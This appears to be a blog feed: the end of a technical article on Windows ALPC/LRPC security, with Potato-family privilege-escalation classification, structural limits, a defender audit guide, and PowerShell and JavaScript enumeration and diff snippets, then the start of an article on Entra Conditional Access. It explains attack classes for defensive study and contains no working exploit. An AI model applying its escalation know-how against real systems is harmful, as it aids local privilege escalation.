| Canonical exemplars | RoguePotato (May 2020) [@roguepotato-blog] [@roguepotato-repo], JuicyPotato, RottenPotato | PrintSpoofer (2020) [@itm4n-printspoofer], EfsPotato, PetitPotam |
| Post-KB5004442 status | Downgraded-authentication DCOM activation blocked by mandatory `RPC_C_AUTHN_LEVEL_PKT_INTEGRITY` enforcement, March 2023 [@mssupport-kb5004442]; the OXID redirect itself is not blocked | Unchanged at the OS level; mitigation is `SeImpersonatePrivilege` hygiene |
| Underlying IPC fabric | LRPC on ALPC | Named pipes |

The HITB Amsterdam 2021 talk The Rise of Potatoes: Privilege Escalation in Windows Services by Andrea Pierini and Antonio Cocomazzi [@hitb-potatoes] is the canonical end-to-end family classification. Pierini and Cocomazzi are also the disclosers of RoguePotato [@roguepotato-blog] -- the variant that broke the post-Windows-10-1809 mitigation by redirecting the OXID resolver to an attacker-controlled host on a port other than 135. The disclosure was May 11, 2020, building on their December 6, 2019 "RogueWinRM" precursor work [@roguewinrm-blog] in which they obtained a SYSTEM identification token but not yet a usable impersonation token.

Note: Does the writeup say ImpersonateNamedPipeClient or RpcImpersonateClient? The first is a named-pipe primitive. The second is an LRPC-on-ALPC primitive. The trigger transport may be shared (DCOM activation, RPRN, EFSR), but the impersonation primitive is what tells you which IPC surface the attack actually exercises -- and which mitigation closes it.
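That triage question is mechanical enough to script. The sketch below is a deliberately naive string match, and the `classifyImpersonationPrimitive` helper is hypothetical; the mitigation strings paraphrase this section and are not an authoritative mapping.

```javascript
// Classify a writeup by the impersonation primitive it names.
function classifyImpersonationPrimitive(writeup) {
  const namedPipe = /\bImpersonateNamedPipeClient\b/.test(writeup);
  const lrpc = /\bRpcImpersonateClient\b/.test(writeup);
  if (namedPipe && lrpc) return { fabric: 'mixed', mitigation: 'review both surfaces' };
  if (namedPipe) return { fabric: 'named pipes', mitigation: 'SeImpersonatePrivilege hygiene' };
  if (lrpc) return { fabric: 'LRPC on ALPC', mitigation: 'RPC interface flags and DCOM hardening' };
  return { fabric: 'unknown', mitigation: 'read the writeup for the impersonation call' };
}

console.log(classifyImpersonationPrimitive('The tool waits on the pipe and calls ImpersonateNamedPipeClient.'));
console.log(classifyImpersonationPrimitive('The activated server calls RpcImpersonateClient during dispatch.'));
```

A result of `unknown` is common in practice, because many writeups name the trigger transport and never mention the impersonation call at all.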

The KB5004442 DCOM hardening rollout [@mssupport-kb5004442], which addresses CVE-2021-26414, completed phase 3 on March 14, 2023. Phase 3 enabled the hardening with no override path: DCOM activations are subject to RPC_C_AUTHN_LEVEL_PKT_INTEGRITY as a mandatory minimum, and the previously available registry overrides were removed. The OS-default configuration since March 2023 closes the JuicyPotato variant that depended on outbound DCOM to TCP/135 with downgraded authentication. RoguePotato and its descendants survived the rollout because they did not depend on the downgrade -- they depend on the OXID redirect itself, which the hardening did not block at the OS-default configuration.

Two adjacent kernel-IPC primitives deserve a footnote. The Windows Notification Facility (WNF) is a kernel-mode publish-subscribe channel for one-way state notifications [@tob-wnf]; processes register interest in named "state names" and the kernel delivers updates. Event Tracing for Windows (ETW) is the kernel's one-way event-streaming substrate [@tob-etw]; providers emit structured events, controllers configure sessions, and consumers read the events back. Yarden Shafir's Trail of Bits posts on both are the canonical practitioner references for the architectural-cousin framing. Neither WNF nor ETW competes with LRPC for the request-reply use case, because neither is request-reply. They are relatives of ALPC -- kernel-mediated message buses -- but they solve different problems.

The comparison matrix gives us the surface area of competing primitives. The next section asks: given this surface area, what can the OS structurally not guarantee?

9. The Limits -- Three Things ALPC and LRPC Structurally Cannot Enforce

The Vista redesign closed half the structural problem of LPC. It left three other things permanently open, and no future ALPC version can close them without a new ABI. Each of the three is a property of the trust model, not a bug in any specific server. Each has a CVE-history footprint that confirms the structural framing.

The interface-callback gate cannot be enforced by the OS. The RpcServerRegisterIf2 contract [@msdocs-rpcregisterif2] accepts a function pointer into the application's address space; the runtime trusts whatever the callback returns. The OS-side enforcement available without an ABI change is at most "invoke the callback" (which RPC_IF_SEC_NO_CACHE [@msdocs-ifflags] already enforces on every call). The OS cannot read the callback's source, cannot infer its policy, and cannot decide whether the callback's verdict matches what the application's specification says it should be. Every interface-callback EoP -- CVE-2019-1162 MSCTF [@ormandy-ctf-2019], the PPL-COM class [@forshaw-com-ppl-2018], CVE-2018-8440 [@nvd-cve-2018-8440] -- is a structural instance of this bound. Closing it requires either inventing a declarative authorization ABI the OS can validate, or sandboxing callback execution. Neither has been proposed as a stable Microsoft direction in any public artefact through 2026.

There is no transitive caller identity. ALPC's Security message attribute captures the caller's token at handshake or on demand; it does not carry a chain of trust across multiple hops. A proxy server in the middle of a call chain has to impersonate explicitly or marshal identity in band, and the receiving party at the far end has no kernel primitive that tells it "the message came from caller A, was forwarded by proxy B, and the original token is still attached." Confused-deputy attacks in the LRPC fabric are not bugs; they are an inherent property of the trust model. The DCOM-activation Potato class [@roguepotato-blog] [@roguepotato-repo] exploits exactly this property: the DCOM activator passes a token into a privileged COM server, and the server cannot reliably tell whether the token chain on the way in matches what the activator's specification said it should be.

The kernel routing path is in the trusted computing base. The ALPC dispatcher runs in Ring 0. Any bug in _ALPC_PORT object lifecycle, in _ALPC_HANDLE_DATA reference counting, in message-attribute marshalling, or in any of the dozens of structures Geoff Chappell's site [@chappell-alpc] [@chappell-alpcp] documents but Microsoft does not, is a direct kernel-elevation primitive. The CVE history demonstrates the assumption is wishful: CVE-2018-8440 [@nvd-cve-2018-8440] has a kernel reference-counting flavour in addition to the well-known interface-callback flavour, and several of the Patch-Tuesday ALPC EoP advisories of 2020-2024 carry NVD descriptions that say "improperly handles calls to Advanced Local Procedure Call (ALPC)" with no further detail because the underlying bug is a kernel bookkeeping issue Microsoft does not enumerate. The kernel routing path is settled engineering by any reasonable standard, but settled engineering is not zero-bug engineering. A new ALPC CVE in any given Patch Tuesday is consistent with the structural model.

flowchart TD
  A[The interface-callback gate -- the OS cannot validate the callback body] --> D[Patch-Tuesday treadmill -- interface callback CVEs, integrity-level CVEs, kernel ALPC CVEs]
  B[No transitive caller identity -- ALPC has no chain-of-trust primitive across hops] --> D
  C[The kernel routing path is in the TCB -- any _ALPC_PORT or attribute bug is a direct kernel EoP] --> D

There is a fourth observation that is not an impossibility result but is worth stating in the same breath: the practical upper bound on local authentication strength. RPC_C_AUTHN_LEVEL_PKT_INTEGRITY is the practical ceiling for local LRPC; the ncalrpc transport supports only RPC_C_AUTHN_WINNT authentication [@msdocs-protseq], and the strongest integrity check the runtime offers under that authentication service is packet integrity. The KB5004442 DCOM rollout [@mssupport-kb5004442] raised the minimum for DCOM activations to PKT_INTEGRITY in March 2023; it did not change the ceiling. The gap between upper and lower bounds is substantial and structural: raising mandatory authentication closes the unauthenticated vector and leaves the authenticated-but-unauthorized vector -- the interface-callback class -- wide open.

Key idea: The OS can require that the callback runs. It cannot require that the callback returns the right answer. The Patch-Tuesday treadmill is the consequence.

Note: CVE-2017-11783, CVE-2018-8440, and CVE-2019-1162 were the canonical exemplars of the interface-callback class. They were not unlucky outliers from an otherwise sound engineering effort. They are instances of a class the design of RpcServerRegisterIf2 cannot exclude. Almost every subsequent year of Patch Tuesdays has shipped further instances of the same class, and 2026's count is on track to be no smaller than 2018's.

Closing the interface-callback gap would look like one of two architectural shifts. Either Microsoft would introduce a declarative authorization language for RPC interfaces -- a manifest the application ships alongside the IDL that the runtime can parse and the OS can validate -- and then forbid the imperative callback. Or the runtime would execute the callback inside a sandbox that constrains what the callback can do (no arbitrary memory reads of the service's address space, no ability to issue privileged syscalls, no ability to side-channel through global state). Neither is on a publicly-named Microsoft roadmap; the closest public artefact is Forshaw's ongoing tooling work on parsing the interface inventory [@forshaw-saatools] [@forshaw-rpc-2019] [@forshaw-poc2023], which equips defenders to audit the callbacks they have rather than to replace the model.

The limits are honest. They are also not the whole story. Research has not stopped trying to close the gap, and the next section names what is still active.

The Patch-Tuesday treadmill is the expected steady state, not a transitional embarrassment. Closing the class requires reworking the contract -- a different ABI, or a sandboxed execution model -- and no public Microsoft roadmap commits to either.

10. Open Problems and a Practical Field Guide (2024-2026)

The 2024-2026 conference cycle is still arguing about how to make the interface-callback class scalable to defend. This section enumerates the open problems and then closes with the practical workflow a defender or an in-house RPC author can run today. The practical recipe is in part an answer to the open problems.

Open problem 1: public RPC fuzzing at Microsoft-internal scale. The public ceiling is RPCForge [@rpcforge] for NDR-aware fuzzing, Forshaw's NtObjectManager for interface inventory and client generation [@forshaw-saatools] [@forshaw-rpc-2019], and the November 2023 PoC talk Building More Windows RPC Tooling for Security Research [@forshaw-poc2023] for the latest research-tooling continuation. Microsoft's internal pipeline is not public; whether a coverage-guided NDR64 fuzzer can become a small-team repeatable Patch-Tuesday tool is open.

Open problem 2: auditing the interface-registration model for structural permissiveness. A defender using Get-RpcServer can enumerate every LRPC interface on a Windows install and dump each interface's procedures and security descriptor. The defender cannot tell, without per-interface manual review, whether a registered callback is correct. Heuristic detection of NULL IfCallbackFn is mechanical; detection of semantically permissive callbacks -- callbacks whose body trusts a field the caller controls -- is open and probably AI-shaped.
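The mechanical half of this problem can be sketched as a triage pass over an exported interface inventory. The record shape (`uuid`, `name`, `hasCallback`, `flags`) is a hypothetical export format, not something a specific tool is known to emit, and the UUIDs are placeholders. The two flag values are the ones defined in the Windows SDK header rpcdce.h.

```javascript
// RPC_IF_* flag values as defined in the Windows SDK header rpcdce.h.
const RPC_IF_ALLOW_SECURE_ONLY = 0x0008;
const RPC_IF_SEC_NO_CACHE = 0x0040;

// Hypothetical record shape: { uuid, name, hasCallback, flags }.
function triage(interfaces) {
  return interfaces
    .map((i) => {
      const findings = [];
      if (!i.hasCallback) findings.push('NULL IfCallbackFn');
      if ((i.flags & RPC_IF_ALLOW_SECURE_ONLY) === 0) {
        findings.push('RPC_IF_ALLOW_SECURE_ONLY not set');
      }
      if (i.hasCallback && (i.flags & RPC_IF_SEC_NO_CACHE) === 0) {
        findings.push('callback verdict may be cached');
      }
      return { uuid: i.uuid, name: i.name, findings };
    })
    .filter((r) => r.findings.length > 0);
}

// Placeholder inventory; the UUIDs and names are made up for the example.
const inventory = [
  { uuid: '00000000-0000-0000-0000-000000000001', name: 'svc-a', hasCallback: false, flags: 0 },
  { uuid: '00000000-0000-0000-0000-000000000002', name: 'svc-b', hasCallback: true,
    flags: RPC_IF_ALLOW_SECURE_ONLY | RPC_IF_SEC_NO_CACHE },
];

const report = triage(inventory);
console.log(JSON.stringify(report, null, 2));
```

A pass like this only catches the cases that are visible in registration metadata. A callback that is present but trusts a caller-controlled field produces no finding here, which is the open part of the problem.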

Open problem 3: RPC_IF_SEC_NO_CACHE adoption and cost. No public catalogue of which Microsoft services use the flag exists. No per-call cost benchmark is published. Defender heuristics that recommend the flag for high-risk interfaces cannot quantify the performance trade-off they are recommending.

Open problem 4: the local-COM-over-LRPC bypass class. Forshaw's 2018 PPL-COM post [@forshaw-com-ppl-2018] articulated a class of attack against Protected Process Light that continues to surface in CVE reports. The structural class is unaddressed at the OS level.

Open problem 5: ALPC as covert channel. The CVE-2019-1162 MSCTF fix [@ormandy-ctf-2019] narrowed the MSCTF subsystem's exposure. The general class of "shared system ALPC ports that ignore caller integrity" is structural; identifying others requires the kind of systematic audit Open Problem 2 names.

Open problem 6: defender SOC integration of the Microsoft-Windows-Kernel-ALPC ETW provider [@msdocs-etwsys]. The provider is high-volume; production SOC pipelines rarely subscribe to it because the event rate overwhelms commodity collection. Per-call ALPC visibility today is concentrated inside EDR vendors that gate it behind antimalware-PPL processes.

Open problem 7: AppContainer-aware RPC capability checking. RpcServerRegisterIf3 [@msdocs-rpcregisterif3] introduces an AppContainer default-deny, but there is no standard pattern for in-house service authors who want to express "this procedure requires capability X." Service authors roll their own; some get it right.

| Tool | Purpose | Author / Org | Reference |
| --- | --- | --- | --- |
| `NtObjectManager` / `NtCoreLib` (formerly `NtApiDotNet`) | LRPC interface enumeration, decompilation, and client generation from PowerShell or .NET | James Forshaw, Project Zero | [@forshaw-saatools] [@forshaw-rpc-2019] |
| RpcView | Qt5/C++ GUI for browsing RPC servers and decompiled interface metadata across Windows versions | silverf0x | [@rpcview-repo] |
| RPC Investigator | .NET Forms UI built on `NtApiDotNet` for enumeration, client workbench, and an "RPC Sniffer" ETW-backed live view | Trail of Bits, January 2023 | [@tob-rpcinv-blog] [@rpcinv-repo] |
| RPCMon | ETW-based GUI for scanning RPC communication, built like Sysinternals Procmon, depending on Forshaw's library | CyberArk Labs | [@rpcmon-repo] |
| RPCForge | NDR-aware local Python fuzzer for ALPC-exposed RPC interfaces | Clement Rouault and Thomas Imbert, Sogeti ESEC | [@rpcforge] |
| Forshaw NDR64 / RPC research pipeline (2023) | Continued research tooling and conference materials | James Forshaw | [@forshaw-poc2023] |

The practical field guide. Eight numbered actions for the defender or in-house RPC service author. Each cites a verified source the reader can re-read in full.

Note:

1. Enumerate registered LRPC interfaces with Install-Module NtObjectManager; Get-RpcServer ... | Where-Object { $_.Endpoints.ProtocolSequence -eq 'ncalrpc' } [@forshaw-saatools] [@forshaw-rpc-2019]. Snapshot before and after Patch Tuesday and diff on (UUID, procedure list, security descriptor).
2. Enumerate live ALPC server ports with Get-NtAlpcServer. The cmdlet returns the named connection ports; the unnamed per-connection ports are not enumerable by design (see Section 4) [@forshaw-saatools].
3. Reach a local RPC server from PowerShell with Forshaw's New-RpcClient cmdlet, which generates a [NtCoreLib.Win32.Rpc.Client]-derived class from the parsed server metadata [@forshaw-rpc-2019]. This is the primitive that lets a Patch-Tuesday differential become an actual interaction.
4. Audit your own RPC service for the canonical mistake: any RpcServerRegisterIf2 or RpcServerRegisterIf3 call with a NULL IfCallbackFn argument is "anyone who can open the port can call any procedure on the interface" [@msdocs-rpcregisterif2] [@msdocs-rpcregisterif3]. Treat NULL callbacks as a finding, not a default.
5. Harden an exposed LRPC interface with the flag combination RPC_IF_ALLOW_SECURE_ONLY | RPC_IF_SEC_NO_CACHE plus an explicit callback that validates I_RpcBindingInqLocalClientPID and the caller's token integrity level [@msdocs-ifflags]. The Microsoft Learn note that "Using the RPC_IF_ALLOW_SECURE_ONLY flag does not imply or guarantee a high level of privilege on the part of the calling user" [@msdocs-ifflags] makes the explicit callback non-optional.
6. For DCOM-activated services, accept the KB5004442 default (RPC_C_AUTHN_LEVEL_PKT_INTEGRITY minimum) and do not invoke registry overrides. The override path was removed in the March 14, 2023 phase 3 rollout [@mssupport-kb5004442].
7. For runtime visibility, enable the Microsoft-Windows-RPC ETW provider via RPCMon [@rpcmon-repo] or RPC Investigator's RPC Sniffer [@tob-rpcinv-blog] [@rpcinv-repo]; correlate per-process per-procedure call rates against the service inventory from step 1.
8. For per-message kernel-level visibility, enable the Microsoft-Windows-Kernel-ALPC system provider from an EVENT_TRACE_SYSTEM_LOGGER_MODE session [@msdocs-etwsys]. Budget for the documented high-volume warning; consider an EDR vendor that runs the provider already if you do not want to host the collection yourself.
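The correlation in step 7 might be sketched like this. The event record shape (`process`, `interfaceUuid`, `procNum`) is an assumption made for illustration: it is not the schema of the Microsoft-Windows-RPC provider, and a real pipeline would first have to map the provider's fields onto something like it. The second UUID is a placeholder.

```javascript
// Count calls per (process, interface, procedure) and mark interfaces
// that do not appear in the inventory captured in step 1.
function summarizeCalls(events, inventory) {
  const counts = new Map();
  for (const e of events) {
    const key = `${e.process}|${e.interfaceUuid}|${e.procNum}`;
    counts.set(key, (counts.get(key) || 0) + 1);
  }
  return [...counts.entries()]
    .map(([key, calls]) => {
      const [process, interfaceUuid, procNum] = key.split('|');
      return {
        process,
        interfaceUuid,
        procNum: Number(procNum),
        calls,
        known: inventory.has(interfaceUuid),
      };
    })
    .sort((a, b) => b.calls - a.calls); // busiest call sites first
}

// Inventory of interface UUIDs from the snapshot; events are hypothetical.
const knownInterfaces = new Set(['201ef99a-7fa0-444c-9399-19ba84f12a1a']);
const traced = [
  { process: 'explorer.exe', interfaceUuid: '201ef99a-7fa0-444c-9399-19ba84f12a1a', procNum: 0 },
  { process: 'explorer.exe', interfaceUuid: '201ef99a-7fa0-444c-9399-19ba84f12a1a', procNum: 0 },
  { process: 'unknown.exe', interfaceUuid: '00000000-0000-0000-0000-0000000000ff', procNum: 3 },
];

const summary = summarizeCalls(traced, knownInterfaces);
console.log(summary);
```

Rows with `known: false` are the interesting ones: traffic to an interface the inventory never saw is either a stale inventory or something worth a closer look.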

// Real shell pipeline that produces the inputs:
//   Get-RpcServer | Export-Clixml -Path C:\Snaps\rpc-pre-patch.xml
//
//   Get-RpcServer | Export-Clixml -Path C:\Snaps\rpc-post-patch.xml
//   Compare-Object (Import-Clixml C:\Snaps\rpc-pre-patch.xml) ...
// The diff logic below is what Compare-Object is doing under the hood, in plain JS.

const pre = new Map([
  ['201ef99a-7fa0-444c-9399-19ba84f12a1a', ['Activate', 'Cancel', 'Continue', 'GetElevationType']],
  ['86d35949-83c9-4044-b424-db363231fd0c', ['SchRpcRegisterTask', 'SchRpcRetrieveTask', 'SchRpcSetSecurity']],
  ['e1af8308-5d1f-11c9-91a4-08002b14a0fa', ['ept_lookup', 'ept_map', 'ept_insert']],
]);

const post = new Map([
  ['201ef99a-7fa0-444c-9399-19ba84f12a1a', ['Activate', 'Cancel', 'Continue', 'GetElevationType', 'RequestElevation2']],
  ['86d35949-83c9-4044-b424-db363231fd0c', ['SchRpcRegisterTask', 'SchRpcRetrieveTask', 'SchRpcSetSecurityV2']],
  ['e1af8308-5d1f-11c9-91a4-08002b14a0fa', ['ept_lookup', 'ept_map', 'ept_insert']],
]);
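A minimal sketch of the diff step over snapshot maps shaped like the `pre` and `post` examples above. The function name `diffSnapshots` and the change-record shape are assumptions made for illustration, and Compare-Object's real behaviour differs in detail. The sample procedure names are the article's illustrative values, not a dump from a real system.

```javascript
// Compare two snapshots shaped as Map<interface UUID, array of procedure names>.
function diffSnapshots(before, after) {
  const changes = [];
  for (const [uuid, afterProcs] of after) {
    if (!before.has(uuid)) {
      changes.push({ uuid, kind: 'interface added', added: afterProcs, removed: [] });
      continue;
    }
    const beforeProcs = before.get(uuid);
    const added = afterProcs.filter((p) => !beforeProcs.includes(p));
    const removed = beforeProcs.filter((p) => !afterProcs.includes(p));
    if (added.length > 0 || removed.length > 0) {
      changes.push({ uuid, kind: 'procedures changed', added, removed });
    }
  }
  for (const [uuid, beforeProcs] of before) {
    if (!after.has(uuid)) {
      changes.push({ uuid, kind: 'interface removed', added: [], removed: beforeProcs });
    }
  }
  return changes;
}

// Small illustrative snapshots: one unchanged interface, one with a renamed procedure.
const before = new Map([
  ['86d35949-83c9-4044-b424-db363231fd0c', ['SchRpcRegisterTask', 'SchRpcSetSecurity']],
  ['e1af8308-5d1f-11c9-91a4-08002b14a0fa', ['ept_lookup', 'ept_map']],
]);
const after = new Map([
  ['86d35949-83c9-4044-b424-db363231fd0c', ['SchRpcRegisterTask', 'SchRpcSetSecurityV2']],
  ['e1af8308-5d1f-11c9-91a4-08002b14a0fa', ['ept_lookup', 'ept_map']],
]);

const changes = diffSnapshots(before, after);
console.log(JSON.stringify(changes, null, 2));
```

Unchanged interfaces produce no record, so the output is short enough to review by hand. A fuller version would also compare security descriptors, which the snapshot tuple in step 1 includes.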

RPCMon ships a hard-coded RPC interface dictionary named RPC_UUID_Map_Windows10_1909_18363.1977.rpcdb.json [@rpcmon-repo] -- a snapshot of Windows 10 1909 build 18363.1977 -- as the baseline against which it labels traced interfaces. The choice to bake in a build-specific baseline is evidence of how often the inventory needs refreshing: a defender running RPCMon on Windows 11 23H2 in 2026 is looking up call sites against a six-year-old dictionary. The accompanying tooling Forshaw built makes the regeneration mechanical in principle; the burden of running the regeneration is what stays on the defender.

Install Forshaw's module and dump every local-only RPC interface on the current Windows install, one row per interface, sorted by procedure count:

Install-Module NtObjectManager -Scope CurrentUser
Get-RpcServer -DbgHelpPath "$env:ProgramFiles\Debugging Tools for Windows\dbghelp.dll" |
  Where-Object { $_.Endpoints.ProtocolSequence -eq 'ncalrpc' } |
  Sort-Object { $_.Procedures.Count } -Descending |
  Select-Object Name, InterfaceId, @{N='Procs';E={$_.Procedures.Count}} |
  Format-Table -AutoSize

Expect dozens of named interfaces on a clean Windows 11 install. Save the output, install Patch Tuesday, run it again, and Compare-Object the two snapshots. That diff is the canonical research workflow that the December 2019 Project Zero post [@forshaw-rpc-2019] introduced.

The single most effective change an in-house LRPC author can make tomorrow morning is to move from `RpcServerRegisterIf2` with `IfCallbackFn = NULL` to `RpcServerRegisterIf3` with both an explicit per-interface security descriptor and a callback that explicitly validates caller identity. The migration is mechanical -- the function signatures are upward-compatible -- and the runtime check the `If3` API adds gives the application a per-call enforcement gate that does not depend on the application's callback being correct. Pair it with `RPC_IF_SEC_NO_CACHE` if the callback inspects token state that can change during a session (group membership, integrity level, AppContainer SID).

The practical recipe answers the everyday question: what do I do tomorrow morning? The misconceptions section answers a harder question: what should I stop believing?

11. FAQ -- Six Misconceptions, Removed

Half the operational confusion about ALPC and LRPC comes from premises that sound plausible and are wrong. This section names six of them. Each answer starts with the wrong answer, explicitly, before correcting it.

Wrong answer: yes. Right answer: every service that exposes an LRPC interface is. Services that expose only `ncacn_np` (named-pipe RPC) or `ncacn_ip_tcp` (TCP RPC) are not reachable over ALPC, even when the caller is on the same machine [@msdocs-protseq]. The print spooler, for example, exposes its primary interface over named pipes and is the trigger for several of the named-pipe-Potato attacks; AppInfo, Task Scheduler, and the endpoint mapper expose theirs over LRPC and are reachable through the kernel ALPC fabric. The right mental model is "every Windows service that wants to be reachable locally with first-class kernel-mediated transport uses LRPC on ALPC", not "every service uses ALPC."

Wrong answer: yes. Right answer: the DCOM-activation Potatoes (RoguePotato [@roguepotato-blog] [@roguepotato-repo], JuicyPotato, RottenPotato) exercise LRPC-on-ALPC because local DCOM activation rides that fabric; the impersonation primitive is `RpcImpersonateClient` inside the activated COM server. The named-pipe Potatoes (EfsPotato, PrintSpoofer [@itm4n-printspoofer], PetitPotam) use `ImpersonateNamedPipeClient` [@msdocs-impnp] as the impersonation primitive and exercise the named-pipe fabric. The trigger transport can be shared (DCOM, RPRN, EFSR), but the impersonation primitive is what tells you which IPC surface the attack actually exercises. See Section 8 for the 30-second classifier and the HITB 2021 Pierini and Cocomazzi talk [@hitb-potatoes] for the canonical end-to-end family classification.

Wrong answer: yes. Several secondary writeups (and the original input premise for this article) say so. Right answer: named connection ports have Object Manager names, typically under `\RPC Control` or per-session AppContainer subtrees. The per-connection communication ports created by `NtAlpcAcceptConnectPort` are unnamed and exist only as handles. This is the structural correction Section 4 walks in full and the load-bearing invariant the Vista redesign rests on: only the parties that completed the handshake can address the per-connection channel. The kernel does not let anyone else find it because there is no name to find.

Wrong answer: yes, it is in the SDK. Right answer: partially. Microsoft *does not* publish a Win32 or WDK API reference for the `Nt*Alpc*` and `Alpc*` surface; the de facto syscall reference is NtDoc [@ntdoc-ntalpc], and the de facto structure reference is Geoff Chappell's site [@chappell-alpc] [@chappell-alpcp]. Microsoft *does* document ALPC architecturally in *Windows Internals 7th Edition Part 2* [@wininternals-7e], Chapter 8 section "Advanced local procedure call (ALPC)"; through the `Microsoft-Windows-Kernel-ALPC` ETW provider [@msdocs-etwsys]; and indirectly through the user-mode RPC runtime documentation. The documentation gap is a deliberate choice -- Microsoft's position is that application authors should use the RPC runtime, not the kernel ALPC API -- and the gap is the reason the public knowledge of ALPC comes from a handful of named researchers reverse-engineering it.

Wrong answer: yes, the abbreviations collide so they must be related. Right answer: LPC was the original Windows NT 3.1-through-Server-2003 kernel IPC primitive, replaced by ALPC in Vista (November 2006) and removed from the kernel by Windows 7 [@csandker-alpc]. LRPC is the Microsoft RPC runtime's *transport* selected when `ncalrpc` is the protocol sequence [@msdocs-protseq]; it has always lived inside `rpcrt4.dll`, and it rides on top of kernel ALPC ports. The two entities are at different layers (kernel object vs user-mode transport) and were named a decade apart -- LRPC in 1994, ALPC in 2006. The abbreviation collision is real; the entities are not the same thing.

Wrong answer: on the Trail of Bits blog. Right answer: it does not exist under that title. The input premise for this article (and several AI-generated summaries circulating in 2024-2025) referenced a *Trail of Bits "ALPC Internals" series* by Shafir. The Trail of Bits author page for Yarden Shafir [@tob-shafir-author] lists her actual posts; the kernel-IPC posts are *Introducing Windows Notification Facility's WNF Code Integrity* (May 2023) [@tob-wnf] and *ETW Internals for Security Research and Forensics* (November 2023) [@tob-etw]. Her dedicated ALPC material lives in her conference training surface, indexed via the Winsider Seminars author page [@winsider-yarden]. The cousin posts (WNF and ETW) are the right Trail of Bits citations for the architectural-cousin framing.

Note: Three sources are worth the rest of an afternoon. Carsten Sandker's three-part Offensive Windows IPC series [@csandker-alpc] [@csandker-rpc] [@csandker-np] is the highest-signal practitioner walkthrough of LPC, ALPC, LRPC, and named pipes available for free on the open web. Windows Internals 7th Edition Part 2 Chapter 8 section Advanced local procedure call (ALPC) [@wininternals-7e] is the Microsoft-blessed architectural reference; cite by ISBN 978-0-13-546238-6. James Forshaw's December 17, 2019 Project Zero post Calling Local Windows RPC Servers from .NET [@forshaw-rpc-2019] is the canonical introduction to the NtObjectManager tooling and the methodology change it unlocked. For the sister-article context in this series: the Object Manager Namespace post explains the \RPC Control parent that every named ALPC connection port lives under, and the upcoming Potato sister post walks the DCOM-activation and named-pipe sub-families through to a working PoC.

The kernel did its job at the port-DACL layer. The application disclaimed responsibility at the interface-callback layer. Almost every Patch-Tuesday LRPC fix since 2018 is some recombination of those two halves, and the half the kernel cannot fix is the half that keeps shipping.

The named-researcher canon for ALPC -- Forshaw, Shafir, csandker, Cerrudo, Cocomazzi, Pierini, Rouault, Imbert, Ormandy, Chappell -- is what this article is an attempt to read in one place.

Who Decided This Token Is Good? A Field Guide to Conditional Access and Entra ID Protection

noreply@paragmali.com (Parag Mali) — Tue, 26 May 2026 00:00:00 GMT

**Conditional Access is Microsoft's Zero Trust policy engine, not a feature.** Every interactive sign-in to a licensed Microsoft 365 tenant flows through three planes: a signal plane (Entra ID Protection's machine-learning risk scoring), a policy plane (Conditional Access's JSON rule evaluator), and a session plane (Continuous Access Evaluation's event-driven revocation channel). This article assembles the wire format of all three -- the `riskDetection` resource on Microsoft Graph, the `conditionalAccessPolicy` schema, the `cp1` client capability that opts a client into 28-hour tokens, and the `401 + insufficient_claims` claims challenge -- into one end-to-end picture, then names the five things this architecture fundamentally cannot do.

1. Who decided this token is good?

It is 09:02 on a Tuesday in Lisbon. Alice opens Outlook on a managed laptop in a hotel and the reading pane populates with mail in under a second. She did not type a password. She did not approve a push. She did not touch a hardware key.

Who decided that was fine?

The question is harder than it looks. Alice's refresh token lives in a token cache from yesterday's sign-in at the office. Outlook's client silently acquires a fresh access token from Entra. That request may match a Conditional Access policy. The policy may consult an Identity Protection risk score. The result is either an access token or a refusal. Exchange Online receives the token, validates it, and may yet revoke it mid-session because something changed in the last sixty seconds. Bytes return to Alice.

Conditional Access: Microsoft Entra ID's policy engine for evaluating sign-in attempts. A Conditional Access policy is a JSON object that matches a set of users, cloud apps, and conditions (network location, device state, sign-in risk, user risk, client app, platform) against a set of grants (block, require MFA, require compliant device, require Authentication Strength, and so on). Policies are evaluated after first-factor authentication; a block grant in any matching policy overrides all allow grants [@ms-ca-overview].

Entra ID Protection: The machine-learning signal plane that scores sign-ins and users for risk. ID Protection emits `riskDetection` events tagged with `riskEventType` (anonymized IP, leaked credentials, password spray, atypical travel, and roughly two dozen others), `riskLevel` (low, medium, high), `riskState`, and `detectionTimingType` (realtime, nearRealtime, or offline). Available only on Microsoft Entra ID P2 [@ms-id-protection-overview].

Continuous Access Evaluation (CAE): The session plane. CAE is an event-driven channel between Microsoft Entra and CAE-aware resource APIs (Exchange Online, SharePoint Online, Teams, Microsoft Graph). When a critical event fires -- account disabled, password reset, high user risk, network location change -- the resource API returns `HTTP 401` with a `WWW-Authenticate: Bearer error="insufficient_claims"` challenge. The client replays the embedded claims to Entra and acquires a fresh token. In exchange for this channel, CAE tokens live up to 28 hours [@ms-cae-concept].
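The "block overrides allow" rule can be illustrated with a deliberately small evaluator. The policy objects use a subset of field names from the Graph `conditionalAccessPolicy` schema (`state`, `conditions.users.includeUsers`, `conditions.applications.includeApplications`, `conditions.signInRiskLevels`, `grantControls.builtInControls`). The sign-in record shape and the functions `matches` and `evaluate` are hypothetical, and the sketch ignores exclusions, `grantControls.operator`, and every other condition the real engine considers.

```javascript
// Does a policy apply to this sign-in? Only three conditions are modelled.
function matches(policy, signIn) {
  if (policy.state !== 'enabled') return false;
  const c = policy.conditions;
  const userOk = c.users.includeUsers.includes('All')
    || c.users.includeUsers.includes(signIn.userId);
  const appOk = c.applications.includeApplications.includes('All')
    || c.applications.includeApplications.includes(signIn.appId);
  const risks = c.signInRiskLevels || [];
  const riskOk = risks.length === 0 || risks.includes(signIn.signInRisk);
  return userOk && appOk && riskOk;
}

// Combine all applicable policies: any block wins, otherwise collect the required controls.
function evaluate(policies, signIn) {
  const applicable = policies.filter((p) => matches(p, signIn));
  if (applicable.some((p) => p.grantControls.builtInControls.includes('block'))) {
    return { decision: 'block', required: [] };
  }
  const required = new Set();
  for (const p of applicable) {
    p.grantControls.builtInControls.forEach((g) => required.add(g));
  }
  return { decision: 'grant', required: [...required] };
}

const policies = [
  {
    displayName: 'Require MFA for all users',
    state: 'enabled',
    conditions: { users: { includeUsers: ['All'] }, applications: { includeApplications: ['All'] } },
    grantControls: { builtInControls: ['mfa'] },
  },
  {
    displayName: 'Block high-risk sign-ins',
    state: 'enabled',
    conditions: {
      users: { includeUsers: ['All'] },
      applications: { includeApplications: ['All'] },
      signInRiskLevels: ['high'],
    },
    grantControls: { builtInControls: ['block'] },
  },
];

const lowRisk = evaluate(policies, { userId: 'alice', appId: 'outlook', signInRisk: 'low' });
const highRisk = evaluate(policies, { userId: 'alice', appId: 'outlook', signInRisk: 'high' });
console.log(lowRisk, highRisk);
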